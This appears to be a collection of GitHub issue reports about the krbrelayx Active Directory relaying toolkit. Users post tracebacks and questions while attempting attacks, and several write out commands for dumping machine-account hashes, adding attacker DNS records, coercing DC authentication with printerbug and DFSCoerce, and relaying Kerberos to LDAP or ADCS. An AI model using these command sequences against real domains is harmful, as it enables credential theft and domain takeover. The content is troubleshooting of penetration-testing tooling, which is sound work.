I found that the config.py file does not have the setIsADCSAttack method

Is it a problem with my environment here?

Thanks

dnstool no longer runs with python 3.8

[-] Connecting to host...
[-] Binding to host
Traceback (most recent call last):
  File "./dnstool.py", line 536, in <module>
    main()
  File "./dnstool.py", line 364, in main
    if not c.bind():
  File "/usr/local/lib/python3.8/dist-packages/ldap3/core/connection.py", line 563, in bind
    response = self.do_ntlm_bind(controls)
  File "/usr/local/lib/python3.8/dist-packages/ldap3/core/connection.py", line 1302, in do_ntlm_bind
    request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client, result['server_creds'])
  File "/usr/local/lib/python3.8/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
    server_creds = name.create_authenticate_message()
  File "/usr/local/lib/python3.8/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
    nt_challenge_response = self.compute_nt_response()
  File "/usr/local/lib/python3.8/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
    response_key_nt = self.ntowf_v2()
  File "/usr/local/lib/python3.8/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
    return hmac.new(password_digest, (self.user_name.upper() + self.user_domain).encode('utf-16-le')).digest()
  File "/usr/lib/python3.8/hmac.py", line 153, in new
    return HMAC(key, msg, digestmod)
  File "/usr/lib/python3.8/hmac.py", line 51, in __init__
    raise TypeError("Missing required parameter 'digestmod'.")
TypeError: Missing required parameter 'digestmod'.

Hello help me please ; I'am read blog;
Use secretsdump,get account machine(computer.test.com) aes256 key & lm:ntlm hashes;
Add dns A record for my attacker machine. For ex. attacker.test.com
python krbrelayx.py -aesKEY "aes256key"
python printerbug.py -hashes lm:ntlm test.com/[email protected] attacker.test.com
printerbug output:
[] Attempting to trigger authentication via rprn RPC at primary-dc.test.com
[] Bind OK
[] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[] Triggered RPC backconnect, this may or ma not have worked

krbrelayx output:
Procotol client ldaps loaded..
Procotol client ldap loaded..
Procotol client smb loaded..

SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'

Computer.test.com =Windows 7
primary-dc.test.com = Windows 2012 server
attacker.test.com = kali

Hello,

I'm getting the following error with one of the server with unconstrained delegation. Check and confirmed that RPC is started and running on the server. Tried switching off the firewall as well.

python printerbug.py -hashes domain/machine account$@hostname test.domain

[*] Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[] Attempting to trigger authentication via rprn RPC at
[] Bind OK
[] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[] Triggered RPC backconnect, this may or may not have worked

python krbrelayx.py -aesKey <>

[] Protocol Client LDAPS loaded..
[] Protocol Client LDAP loaded..
[] Protocol Client SMB loaded..
[] Running in export mode (all tickets will be saved to disk)
[*] Setting up SMB Server

[] Setting up HTTP Server
[] Servers started, waiting for connections
[] SMBD: Received connection from 192.168.0.1
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[] SMBD: Received connection from 192.168.0.1

Could you please guide me like what could be wrong. Is it something related to the impacket version i'm using.

I wanted to say first this is a great tool, I use it all the time, and I appreciate all the work and research that went into it!

Overall, my question is about whether it's possible to relay DNS, HTTP, or other authentication that maps implicitly to the HOST class to high value services that also map to the HOST class (ideally LDAP or SMB if they do) and don't require signing by modifying the value of the client's integrity flag.

My question harkens back to a couple statements you made in part two of your Kerberos relaying articles:

1. You can't relay DNS authentication to LDAP because the flag that requests integrity (signing) is set by the client.
2. You can relay DNS authentication to HTTP because it ignores the flag and both services map to the HOST class.

Part 1: Is it possible to relay any service that maps to the HOST class to services where signing is optional (again I'm thinking LDAP and SMB) by sniffing, modifying, and relaying traffic between a victim and a target and specifically modifying the value of the integrity flag so the client is not requesting signing? This is my understanding of what Krbjack is doing here: https://github.com/almandin/krbjack/blob/d4bdd9a3b61303eda5dbc614f3448a8b469c0e53/krbjack/tcpforward.py#L37

Part 2: You say in your article 'many' services map to the HOST class. Do you know of a list of services that do this? I'm wondering specifically about those with obvious attacks that lead to privilege escalation (like SMB or LDAP) but also others. I couldn't find a list of all the services that map to the HOST class anywhere, including in the referenced project zero articles.

If my understanding is correct and there are high value services that map to the HOST class and don't require signing by default, then relaying to these services is a feature I would like to see and would do my best to help implement. Thanks!

When relaying a printerbug.py connection from one domain controller to another I get to the end of the attack and am met with the following message:

[-] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-03150E49, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

I attempted to perform the attack against ldap (specifying an existing computer account) and ldaps. I am led to believe that this means these domain controllers are not vulnerable and have likely been patched.

Is this assumption correct? I just wanted to double check because it seems odd that I can drop the mic successfully but cannot modify computer/user objects.

Either way- thanks for putting together these attacks!

Hello Dirk,

I get the "Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider" in the last step when I try to authenticate with printer-bug and DFSCoerce. I could not find what the issue was. I have followed the below steps.

1. DC - 2016
2. Attacker- Kali
3. Unconstrained delegation machine- Windows 10

Step - 1
I got the AES-256 and 128 as well as NTHash of the machine account by running secretsdump.py

Step - 2
Queried for the SPN

Step - 3
Added SPN record

Step - 4
Added DNS record

Step-5
A record

Step- 6
nslookup verification

Step - 7
Printer Bug

DFSCoerce

Step - 8
Krbrelayx setup

Ultimately, I got the 'NTLMSSP - Microsoft NTLM Security Support Provider' error.

I could not find figure out what the issue is

Hi,

I can successfully perform the ADCS attack that you describe here. However, once I try for example targeting LDAPS on a DC in order to add a computer account it always fails with the error "Could not find the correct encryption key! Ticket is encrypted with keytype 18, but keytype(s) were supplied".

This is how I configure mitm6:

After this I disable then reenable the NIC on the machine I MITM using mitm6 (client1.adlab.local/10.0.0.210) in order for the machine to be MITM.

This is how I trigger a Kerberos authentication on the machine I MITM using mitm6 (client1.adlab.local/10.0.0.210):

This is how I configure krbrelayx and the error I get:

The DC is running a fully patched Server 2019 and the client is running a fully patched Windows 10.

Is this a bug or am I doing something wrong?

Hello,

here is what happens when I try adding a record using dnstool.py (of course replacing the values for DOMAIN, USER, PASSWORD):

python3 /opt/krbrelayx/dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record 'kali' --action add --data 192.168.50.59 SRV-AD-02

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 82, in receiving
    data = self.connection.socket.recv(self.socket_size)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/krbrelayx/dnstool.py", line 610, in <module>
    main()
  File "/opt/krbrelayx/dnstool.py", line 538, in main
    c.add(record_dn, ['top', 'dnsNode'], node_data)
  File "/usr/local/lib/python3.11/dist-packages/ldap3/core/connection.py", line 987, in add
    response = self.post_send_single_response(self.send('addRequest', request, controls))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 121, in post_send_single_response
    responses, result = self.get_response(message_id)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/base.py", line 356, in get_response
    responses = self._get_response(message_id, timeout)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 157, in _get_response
    responses = self.receiving()
                ^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 92, in receiving
    raise communication_exception_factory(LDAPSocketReceiveError, type(e)(str(e)))(self.connection.last_error)
ldap3.core.exceptions.LDAPSocketReceiveError: error receiving data: [Errno 104] Connection reset by peer

After that, I am not able to make a simple connection to the DC using cme/nxc...

It is the use of dnstool.py that creates this situation, no other tool does that. What could I provide you with to help you troubleshoot?

I am getting the following error when trying kerberos relaying:

[*] DNS: Client sent authorization

Exception happened during processing of request from ('10.191.128.155', 53073)
Traceback (most recent call last):
File "/usr/lib/python3.8/socketserver.py", line 683, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.8/socketserver.py", line 747, in init
self.handle()
File "/home/ubuntu/krbrelayx/lib/servers/dnsrelayserver.py", line 54, in handle
self.do_relay(authdata)
File "/home/ubuntu/krbrelayx/lib/servers/dnsrelayserver.py", line 68, in do_relay
client.initConnection(authdata, self.server.config.dcip)
TypeError: initConnection() takes 1 positional argument but 3 were given
----------------------------------------`

For the sake of completness, I have installed the latest impacket, ldap3, dnspython and pulled the most recent krbrelayx.

I appreciate greatly any hints or tips on this.

Help!

I have all the dependencies installed. But it is not working as expected.
I am getting the following error

dnstool.py -u intelligence\\Tiffany.Molina -p SOMEPASSWORD --action add --record web-kali --data 10.10.17.81 --type A intelligence.htb

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
Traceback (most recent call last):
  File "dnstool.py", line 543, in <module>
    main()
  File "dnstool.py", line 465, in main
    record = new_record(addtype, get_next_serial(args.host, zone,args.tcp))
  File "dnstool.py", line 242, in get_next_serial
    res = dnsresolver.resolve(zone, 'SOA',tcp=tcp)
AttributeError: 'Resolver' object has no attribute 'resolve'

[] Protocol Client LDAP loaded..
[] Protocol Client LDAPS loaded..
[] Protocol Client SMB loaded..
[] Protocol Client HTTPS loaded..
[] Protocol Client HTTP loaded..
[] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
Traceback (most recent call last):
File "/root/桌面/krbrelayx-master/krbrelayx.py", line 261, in
main()
File "/root/桌面/krbrelayx-master/krbrelayx.py", line 241, in main
c = start_servers(options, threads)
File "/root/桌面/krbrelayx-master/krbrelayx.py", line 97, in start_servers
s = server(c)
File "/root/桌面/krbrelayx-master/lib/servers/smbrelayserver.py", line 89, in init
self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig)
File "/usr/lib/python3/dist-packages/impacket/smbserver.py", line 3941, in init
socketserver.TCPServer.init(self, server_address, handler_class)
File "/usr/lib/python3.9/socketserver.py", line 452, in init
self.server_bind()
File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 99] Cannot assign requested address

I'm using python3 to run the latested mitm6 and krbrelayx, ad cs attack through dns kerberos relay
works fine on ubuntu
but got this error on kali and kylinos

I was getting the following error when trying to do anything with a target user with a . character in the name.
[!] Target record not found!

This is do to the check on line

Hello,
I'm getting the following error when trying to run the addspn.py script on the host with unconstrained delegation

python addspn.py -u <machine account$> -p -s HOST/test.internal.corp -q DC

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
Traceback (most recent call last):
File "addspn.py", line 144, in
main()
File "addspn.py", line 104, in main
from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
ImportError: No module named ldaptypes

python3 addspn.py -u <machine account$> -p -s HOST/test.internal.corp -q DC
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
Traceback (most recent call last):
File "addspn.py", line 144, in
main()
File "addspn.py", line 104, in main
from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
File "", line 983, in _find_and_load
File "", line 963, in _find_and_load_unlocked
File "", line 906, in _find_spec
File "", line 1280, in find_spec
File "", line 1254, in _get_spec
File "", line 1235, in _legacy_get_spec
File "", line 441, in spec_from_loader
File "", line 594, in spec_from_file_location
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.19-py3.7.egg/impacket/ldap/ldaptypes.py", line 192
GENERIC_READ = 0x80000000L
^
SyntaxError: invalid syntax

Using impacket version 0.9.19

Tried installing the python dependencies
apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev

and pip3 install pyldap

and pip3 install python-ldap

While i do succeed in creating new records with powermad i am getting the following error with dnstool:

LDAP operation failed. Message returned from server: constraintViolation 000020B5: AtrErr: DSID-03152B47, #1: 0: 000020B5: DSID-03152B47, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 9030e (objectCategory)

Is there a difference on how the records are set or PEBKAC?

The targetsutils.py is missing from the /lib/utils/ folder! So, when you run the krbrelayx.py you get the following error:

ImportError: No module named targetsutils

However, this can be easily resolved by copying impacket's targetsutils.py under your project's folder /lib/utils/.

Using latest version of impacket, when running krbrelayx I get the following error

python krbrelayx.py
[] Protocol Client SMB loaded..
[] Protocol Client LDAPS loaded..
[] Protocol Client LDAP loaded..
[] Running in export mode (all tickets will be saved to disk)
Traceback (most recent call last):
File "krbrelayx.py", line 242, in
main()
File "krbrelayx.py", line 222, in main
c = start_servers(options, threads)
File "krbrelayx.py", line 83, in start_servers
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user)
TypeError: setLDAPOptions() takes exactly 8 arguments (6 given)

I got the following error when attempting a login with printerbug.py on a Cyrillic domain, is it possible this is related to this issue or am I completely wrong here? New to the Impacket library so forgive me if this is off base.

Issue in question: fortra/impacket#51

Output:

python printerbug.py DOMAIN\user:[email protected] attacker

[] Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[] Attempting to trigger authentication via rprn RPC at machine.domain.local
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Traceback (most recent call last):
File "printerbug.py", line 198, in
main()
File "printerbug.py", line 191, in main
lookup.dump(remote_name)
File "printerbug.py", line 77, in dump
self.lookup(rpctransport, remote_host)
File "printerbug.py", line 87, in lookup
dce.connect()
File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
return self._transport.connect()
File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 400, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 547, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

I am following the latest article and the attack is failing at the last stage.

Any pointers would be great!

https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/

Hi @dirkjanm,

Per our conversation...I am creating this issue. FYI, I first ran ldapdelete, which seemed to work perfectly:

[+] Bind OK
[-] Modifying record
[+] LDAP operation completed successfully

After I ran ldapdelete, I used remove and I got this error:

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Target has only one record, tombstoning it
Traceback (most recent call last):
  File "dnstool.py", line 536, in <module>
    main()
  File "dnstool.py", line 516, in main
    'dNSTombstoned': [(MODIFY_REPLACE, True)]})
  File "/usr/local/lib/python3.6/dist-packages/ldap3/core/connection.py", line 1140, in modify
    request = modify_operation(dn, changelist, self.auto_encode, self.server.schema if self.server else None, validator=self.server.custom_validator if self.server else None, check_names=self.check_names)
  File "/usr/local/lib/python3.6/dist-packages/ldap3/operation/modify.py", line 70, in modify_operation
    partial_attribute['vals'].setComponentByPosition(index, prepare_for_sending(validate_attribute_value(schema, attribute, value, auto_encode, validator, check_names=check_names)))
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/univ.py", line 1920, in setComponentByPosition
    value = componentType.clone(value=value)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/base.py", line 376, in clone
    return self.__class__(value, **initializers)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/univ.py", line 837, in __init__
    base.SimpleAsn1Type.__init__(self, value, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/base.py", line 267, in __init__
    value = self.prettyIn(value)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/univ.py", line 912, in prettyIn
    return bytes(value)
  File "/usr/local/lib/python3.6/dist-packages/impacket/structure.py", line 166, in __getitem__
    return self.fields[key]
KeyError: 0

Hopefully, I cleaned up my A record in the right order :). Thanks again for your help!